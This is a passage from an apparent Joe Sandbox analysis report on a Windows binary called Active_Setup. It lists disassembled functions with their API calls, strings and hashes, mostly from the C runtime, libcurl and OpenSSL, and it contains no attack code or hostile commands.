• _signal.LIBCMT ref: 0104CE27
  • Part of subcall function 010851F4: __getptd_noexit.LIBCMT ref: 0108525E
  • Part of subcall function 010851F4: __malloc_crt.LIBCMT ref: 0108527D
  • Part of subcall function 010851F4: _siglookup.LIBCMT ref: 010852A3
• _signal.LIBCMT ref: 0104CE38
  • Part of subcall function 010851F4: __lock.LIBCMT ref: 010852E8
  • Part of subcall function 010851F4: SetConsoleCtrlHandler.KERNEL32(01085115,00000001,?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 0108530B
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085357
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085365
• _signal.LIBCMT ref: 0104CE49
  • Part of subcall function 010851F4: GetLastError.KERNEL32(?,?,?,?,010E5250,00000010,0104CD6D,00000016,00000000), ref: 01085327
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085377
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 01085385
• _signal.LIBCMT ref: 0104CE5A
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 01085397
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853A5
• _signal.LIBCMT ref: 0104CE6B
  • Part of subcall function 010851F4: __decode_pointer.LIBCMT ref: 010853B7
  • Part of subcall function 010851F4: __encode_pointer.LIBCMT ref: 010853C5
• _signal.LIBCMT ref: 0104CE7C
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _signal$__decode_pointer__encode_pointer$ConsoleCtrlErrorHandlerLast__getptd_noexit__lock__malloc_crt_siglookup
• String ID:
• API String ID: 1354346430-0
                                                                                                                                                  • Opcode ID: 8f114f1a4ba0b82d6ba35eb316499521a5e147234618e0d012789c26fe9f6753
                                                                                                                                                  • Instruction ID: 6aa716c30fbeca65c612a53104bbe797045253536ab7c28cea72148594f7498a
                                                                                                                                                  • Opcode Fuzzy Hash: 8f114f1a4ba0b82d6ba35eb316499521a5e147234618e0d012789c26fe9f6753
                                                                                                                                                  • Instruction Fuzzy Hash: 63F0E2FAA86302A6FB107B716EC7B5A39506710A04F00052DBAD4BE685EFFA6045D709
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _memset
• String ID: $%02x%c$%04x - $%s%04x - <SPACES/NULS>
• API String ID: 2102423945-310954626
• Opcode ID: 6a060ec20f73cfe11269bbdec12b515e03e222ff43ab45d7dfc230b316f986d3
• Instruction ID: 5d2c89ed49b9114b1f7da4bf020a918484d9a726fc0743cfad0ecc7bccce07d7
• Opcode Fuzzy Hash: 6a060ec20f73cfe11269bbdec12b515e03e222ff43ab45d7dfc230b316f986d3
• Instruction Fuzzy Hash: 108116729083499FC324DA58CC81BFFB3E9EFD8704F44482DF69587291E6B5D9089B92
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _strncmp
• String ID: .\crypto\x509v3\v3_ncons.c$excluded$permitted
• API String ID: 909875538-3320112686
• Opcode ID: a9b83aeef086ee6397881eff9a8d00c88d46fd87ba2843fd20c0e60a94d30664
• Instruction ID: e365a78ea7e5660b487a8a45ff659b22feda416c91ac6f527d30f7858e4971f7
• Opcode Fuzzy Hash: a9b83aeef086ee6397881eff9a8d00c88d46fd87ba2843fd20c0e60a94d30664
• Instruction Fuzzy Hash: AB416EB2B403815BE720E766EC82F6773859FC4714F08043DF9899E383F665E905A3A2
APIs
• curl_maprintf.ACTIVE_SETUP(%sAuthorization: NTLM %s,Proxy-,?), ref: 00FD2F3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: curl_maprintf
• String ID: %sAuthorization: NTLM %s$NTLM$Proxy-
• API String ID: 3307269620-3263743893
• Opcode ID: dda0a6c9b1e4e0d60c8590dc016b49ec6980854b67279f10d87ab4211931e105
• Instruction ID: 769e14362e0d941b317f477f0f8828d0128f8040f8fabd1ba86c3bee6033f956
• Opcode Fuzzy Hash: dda0a6c9b1e4e0d60c8590dc016b49ec6980854b67279f10d87ab4211931e105
• Instruction Fuzzy Hash: D341A1B1A002058FD760DF59D948B67B7E9FF80314F18482EF5848B301E775E948DBA2
APIs
• curl_strequal.ACTIVE_SETUP(?,0109FD68,00000000,?,00000000,?,?,00FC2DF7,?), ref: 00FC275E
• _fgets.LIBCMT ref: 00FC27BE
• _fgets.LIBCMT ref: 00FC281E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _fgets$curl_strequal
• String ID: Set-Cookie:$none
• API String ID: 1107385850-3629594122
• Opcode ID: a89a009ebd558818af561fcab99048b4b5132afa12f8bd14e1df65233e00c905
• Instruction ID: a199321809d5900e910179b3bd2df08d2f1daae94e72396a5141bfc01d9752a5
• Opcode Fuzzy Hash: a89a009ebd558818af561fcab99048b4b5132afa12f8bd14e1df65233e00c905
• Instruction Fuzzy Hash: D0317B71E043075BD7706F145E87F9776D4DF50324F18442EF885DB282EB65CD44A2A2
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
Similarity
• API ID: _getenv
• String ID: .rnd$HOME$RANDFILE
• API String ID: 3834326495-2139794832
• Opcode ID: 0fcf0d3fc0c69e275803faa45f7b8dacdc5f186a90a887949625973f2ff020ce
• Instruction ID: 1846380e3ff71a4286de38e522a6c8f1270b620f58af807becc74267ae8bda80
• Opcode Fuzzy Hash: 0fcf0d3fc0c69e275803faa45f7b8dacdc5f186a90a887949625973f2ff020ce
• Instruction Fuzzy Hash: 8121F322A083A226C63276666C05A9BB6969F92760F1D065AE880DF301F654CE46A2D2
Strings
• the ioctl callback returned %d, xrefs: 00FD1647
• ioctl callback returned error %d, xrefs: 00FD165A
• seek callback returned error %d, xrefs: 00FD1618
• necessary data rewind wasn't possible, xrefs: 00FD1694
Memory Dump Source
• Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                                                                                                                                  • API String ID: 4251218765-2561564945
                                                                                                                                                  • Opcode ID: 138803f4605ec05a066ccb1e7d94f71754e4c96f7694ceed7390c47f1d12f760
                                                                                                                                                  • Instruction ID: 3d70445c365ab2a05a377953f8c3d1443ac237f2480849f91abe6659a9fc9263
                                                                                                                                                  • Opcode Fuzzy Hash: 138803f4605ec05a066ccb1e7d94f71754e4c96f7694ceed7390c47f1d12f760
                                                                                                                                                  • Instruction Fuzzy Hash: AF210A72F40B017FE6309528EC02FE77398BF91730F0C051EF5689A281D6B8E8859655
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC1085
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                                  • String ID: Data$Header$[%s %s %s]$from
                                                                                                                                                  • API String ID: 1809024409-3178933089
                                                                                                                                                  • Opcode ID: 47c53da876f316e2c6c2d5a728154edd53fd41e215447eeb9e96095542dcbe40
                                                                                                                                                  • Instruction ID: 30937fcf9ca8d69c4eaba5f1aeaf956d73b62739f0567c10a2fa736e870a6fdd
                                                                                                                                                  • Opcode Fuzzy Hash: 47c53da876f316e2c6c2d5a728154edd53fd41e215447eeb9e96095542dcbe40
                                                                                                                                                  • Instruction Fuzzy Hash: D711D231B083868BD730DA14CA62FA7B3D6FFC9300F54451D9588C7211EB75EC549782
                                                                                                                                                  APIs
                                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000008,00000004,00000004), ref: 00FC2F41
                                                                                                                                                  • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00FC2FB7
                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00FC2FC1
                                                                                                                                                    • Part of subcall function 00FC10F0: curl_mvsnprintf.ACTIVE_SETUP(?,00000801,?,?,00FBEBDD), ref: 00FC1133
                                                                                                                                                  Strings
                                                                                                                                                  • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00FC2FC9
                                                                                                                                                  • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00FC2F4C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorIoctlLastcurl_mvsnprintfsetsockopt
                                                                                                                                                  • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                                                                                                                                  • API String ID: 3446994914-277924715
                                                                                                                                                  • Opcode ID: fa2319cefede975c7373b43d4891f08b88e861e177372641aa948338043d7056
                                                                                                                                                  • Instruction ID: 285b6719d1d55506944cff61dd6db808e464530c95f26973b5cda2229dfd26e2
                                                                                                                                                  • Opcode Fuzzy Hash: fa2319cefede975c7373b43d4891f08b88e861e177372641aa948338043d7056
                                                                                                                                                  • Instruction Fuzzy Hash: 9E11C1B0A443016BE310AB759C07F1BB7E8FB94B00F44492CB689D61C1EA78D604D7A6
                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F78
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F89
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                  • String ID: MOC$csm
                                                                                                                                                  • API String ID: 803148776-1389381023
                                                                                                                                                  • Opcode ID: 73ba7ba13160aeacbfda672c2e4dccc5adac85a5c97d92267ebcf015c9588ecd
                                                                                                                                                  • Instruction ID: b53f958c9870f0acbab6b0cd22b0be98d756903dc375983e2e201d5026fef12a
                                                                                                                                                  • Opcode Fuzzy Hash: 73ba7ba13160aeacbfda672c2e4dccc5adac85a5c97d92267ebcf015c9588ecd
                                                                                                                                                  • Instruction Fuzzy Hash: DFE0863511420A8FDB10BB68C074BAD37D8FB74324F2605E1F4CCCB226E774D540A542
                                                                                                                                                  APIs
                                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00FB220D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileMove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3562171763-0
                                                                                                                                                  • Opcode ID: 7ffa8a18e9fe133ab57e18c6cf651c5e8ad3450386958b328adaa9df6cde6717
                                                                                                                                                  • Instruction ID: cb7b5b4be7725c015d5db43aacb21c2e746ea0c5146230c8f5de229422626ee9
                                                                                                                                                  • Opcode Fuzzy Hash: 7ffa8a18e9fe133ab57e18c6cf651c5e8ad3450386958b328adaa9df6cde6717
                                                                                                                                                  • Instruction Fuzzy Hash: E321D633B402115BD7705A2EAC08FA7B79CAB94771F114736FA46EB2C0CA64ED01AB94
                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 010894E3
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 01089503
                                                                                                                                                  • __lock.LIBCMT ref: 01089513
                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 01089530
                                                                                                                                                  • InterlockedIncrement.KERNEL32(02822CE0), ref: 0108955B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                  • Opcode ID: aaa66db648907e609ed19ddbb58897038c24f13ac5c8d7ae39cb8fc3fddaaf27
                                                                                                                                                  • Instruction ID: ee38096f0e3aaa09b63816ca61cde43f4825a3e89a5bf76fcc53d1685ace640c
                                                                                                                                                  • Opcode Fuzzy Hash: aaa66db648907e609ed19ddbb58897038c24f13ac5c8d7ae39cb8fc3fddaaf27
                                                                                                                                                  • Instruction Fuzzy Hash: 9601F972A087229BE771BF6DD5157BD77E0BF40B28F100049E9D4A7284CB359981CBE5
                                                                                                                                                  APIs
                                                                                                                                                  • __lock.LIBCMT ref: 01080B9A
                                                                                                                                                    • Part of subcall function 0108B9F1: __mtinitlocknum.LIBCMT ref: 0108BA07
                                                                                                                                                    • Part of subcall function 0108B9F1: __amsg_exit.LIBCMT ref: 0108BA13
                                                                                                                                                    • Part of subcall function 0108B9F1: EnterCriticalSection.KERNEL32(?,?,?,0108CBFA,00000004,010E5538,0000000C,0108B209,0107FCF5,?,00000000,00000000,00000000,?,010878BB,00000001), ref: 0108BA1B
                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 01080BA5
                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 01080BB4
                                                                                                                                                  • HeapFree.KERNEL32(00000000,0107FCF5,010E5068,0000000C,0108B9D2,00000000,010E5518,0000000C,0108BA0C,0107FCF5,?,?,0108CBFA,00000004,010E5538,0000000C), ref: 01080BE4
                                                                                                                                                  • GetLastError.KERNEL32(?,0108CBFA,00000004,010E5538,0000000C,0108B209,0107FCF5,?,00000000,00000000,00000000,?,010878BB,00000001,00000214), ref: 01080BF5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                                  • Opcode ID: 9419c455e280d04652976f5462db9d45bdcbc6221c1405501cd2a4cd2e806895
                                                                                                                                                  • Instruction ID: 0ac4a0fffa122a829ac428f920d0350e7b2407c50790ccae60d9b981d239822b
                                                                                                                                                  • Opcode Fuzzy Hash: 9419c455e280d04652976f5462db9d45bdcbc6221c1405501cd2a4cd2e806895
                                                                                                                                                  • Instruction Fuzzy Hash: 8301A27280C307EEDB307FB99809B9E7AE4AF10764F140449F5C4A6088DF398545CB91
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 01085075: _doexit.LIBCMT ref: 01085081
                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 010804F4
                                                                                                                                                    • Part of subcall function 0108771B: TlsGetValue.KERNEL32(0107FCF5,010878A7,?,0107FCF5,?), ref: 01087724
                                                                                                                                                    • Part of subcall function 0108771B: __decode_pointer.LIBCMT ref: 01087736
                                                                                                                                                    • Part of subcall function 0108771B: TlsSetValue.KERNEL32(00000000,0107FCF5,?), ref: 01087745
                                                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 010804FF
                                                                                                                                                    • Part of subcall function 010876FB: TlsGetValue.KERNEL32(?,?,01080504,00000000), ref: 01087709
                                                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 01080512
                                                                                                                                                    • Part of subcall function 0108774F: __decode_pointer.LIBCMT ref: 01087760
                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 0108051B
                                                                                                                                                  • ExitThread.KERNEL32 ref: 01080522
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 01080528
                                                                                                                                                  • __freefls@4.LIBCMT ref: 01080548
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0108055B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 132634196-0
                                                                                                                                                  • Opcode ID: 5526945e464aab7d1e97371b1e6f9fca402c167b71ab43acae2a1c3838954bac
                                                                                                                                                  • Instruction ID: 52fd949ba84fa8405f0e42c65e3d8aaec3f06c11010b45c1e77574791d42d491
                                                                                                                                                  • Opcode Fuzzy Hash: 5526945e464aab7d1e97371b1e6f9fca402c167b71ab43acae2a1c3838954bac
                                                                                                                                                  • Instruction Fuzzy Hash: CCE04671808207678F113BF59D088DF3A6CBE65248F640810BAD4D3009FA2994128BB5
                                                                                                                                                  APIs
                                                                                                                                                  • _fprintf.LIBCMT ref: 010727B2
                                                                                                                                                    • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
